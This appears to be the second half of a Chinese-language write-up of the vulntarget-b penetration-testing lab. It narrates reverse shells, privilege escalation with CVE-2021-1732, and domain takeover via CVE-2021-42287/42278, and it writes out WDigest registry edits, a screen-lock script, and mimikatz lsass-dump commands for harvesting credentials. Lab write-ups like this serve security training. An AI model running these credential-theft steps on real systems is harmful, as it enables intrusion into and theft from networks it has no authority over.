[永久开源] vulntarget-b_打靶记录(下)

简介: [永久开源] vulntarget-b_打靶记录

link位置是base64编码的地址



然后正常访问到下载的木马文件



获取到之后直接就是root权限。在这里尝试了多次正向失败,关闭本地防火墙然后进行反弹shell:



使用监听:



反弹成功:



查看进程,当前机器使用了火绒:


寻找提权的方式,使用systeminfo命令,将结果复制到网站:


最终使用了CVE_2021_1732_win32k这个提权工具,多执行几次就能成功,我也是看作者这样做的:



查看网卡的配置,当前是存在域环境的,然后也存在第二块网卡,添加路由:



使用命令查找域控制器的IP,由于存在火绒,需要谨慎操作,不然session会断掉:



当前进程中,也是存在域用户的,存在域用户就可以使用域提权漏洞获取域控制器的权限:



使用mimikatzcreds_all命令抓取密码 ,但是没有明文密码。使用这个命令并未拦截:



由于是win10系统,微软在windows 2012 之后就打了补丁kb2871997,需要修改注册表抓取密码。第一条是开启,第二条是关闭:




reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /freg add HKLMS\YSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

修改注册表之后,需要重启或者管理员重新登录才能抓取明文密码,这里可以使用脚本让其锁屏

lock.ps1

Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation


这样就抓取到了明文密码:



对域控IP进行端口扫描,开放的88,445,135端口:



2.3 域提权 CVE-2021-42287/CVE-2021-42278


使用py脚本,填写"域/域用户:域密码",成功获取到域控机器的权限:



使用脚本开启3389,使用rdp协议进行连接:



关闭防火墙:



但是在这里连接失败



原因是由于域控机器开启了如下的功能,需要使用相同的机器才能进行远程访问:



上面的exp脚本也可以直接-dump导出当前的hash,我忘记截图了。然后使用将hash进行md5解密,得知密码:Admin@123

既然知道了密码,在win10机器上进行IPC连接,上传正向的后门到域控制器:


成功获取到域控制器的机器



如下就是所有的sessions


2.4 拓展

还可以使用procdump的方式导出lsass.exe,存放在当前文件的lsass.dmp


接着使用mimikatz进行密码读取


mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

相关文章
|
安全 Linux Shell
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
2757 0
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
|
Web App开发 JavaScript
Vue 项目中使用 debugger 在 chrome 谷歌浏览器中失效以及 console.log 指向去了 vue.js 代码
Vue 项目中使用 debugger 在 chrome 谷歌浏览器中失效以及 console.log 指向去了 vue.js 代码
1452 0
解决:下列软件包有未满足的依赖关系: libc6-dev : 破坏: binutils (< 2.38) 但是 2.35.1-7 正要被安装E: 错误,pkgProblemResolver::Re
解决:下列软件包有未满足的依赖关系: libc6-dev : 破坏: binutils (< 2.38) 但是 2.35.1-7 正要被安装E: 错误,pkgProblemResolver::Re
2049 0
|
安全 NoSQL 网络协议
SSRF内网打穿相关姿势
本文详细介绍了服务器端请求伪造(SSRF)漏洞,包括其定义、漏洞场景、常见漏洞函数、URL伪协议及其利用方法。通过具体的靶机示例,展示了如何利用SSRF漏洞进行内网探测、命令执行、SQL注入、命令注入、XXE注入、Tomcat任意文件上传和Redis未授权访问等攻击。文章还提供了相关工具和参考资料,帮助读者更好地理解和应对SSRF漏洞。
1033 0
SSRF内网打穿相关姿势
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
|
前端开发 PHP 开发工具
CTFshow 信息搜集篇 web1-web20
CTFshow 信息搜集篇 web1-web20
234 0
|
Rust 监控 安全
【专栏】`ripgrep`(rg)是Linux下快速、内存高效的文本搜索工具,用Rust编写,支持PCRE2正则表达式
【4月更文挑战第28天】`ripgrep`(rg)是Linux下快速、内存高效的文本搜索工具,用Rust编写,支持PCRE2正则表达式。相比`grep`,它在处理大文件和复杂模式时更具优势。安装`rg`可通过软件包管理器,如在Debian系系统中使用`sudo apt install ripgrep`。基本用法包括简单搜索、递归搜索、忽略大小写、显示行号等。高级功能包括固定字符串搜索、多文件匹配、并行搜索、排除选项和区域搜索。适用于日志分析、代码审查等场景,是提升工作效率的利器。
1519 4
|
IDE 开发工具 C++
插件:CLion中使用C/C++ Single File Execution插件编译和运行单个文件
插件:CLion中使用C/C++ Single File Execution插件编译和运行单个文件
1158 0
|
安全 网络安全 数据安全/隐私保护
BUUCTF:Misc 解析(四)
BUUCTF:Misc 解析(四)
|
SQL 安全 Shell
[永久开源] vulntarget-b_打靶记录(上)
[永久开源] vulntarget-b_打靶记录
562 0
下一篇
oss云网关配置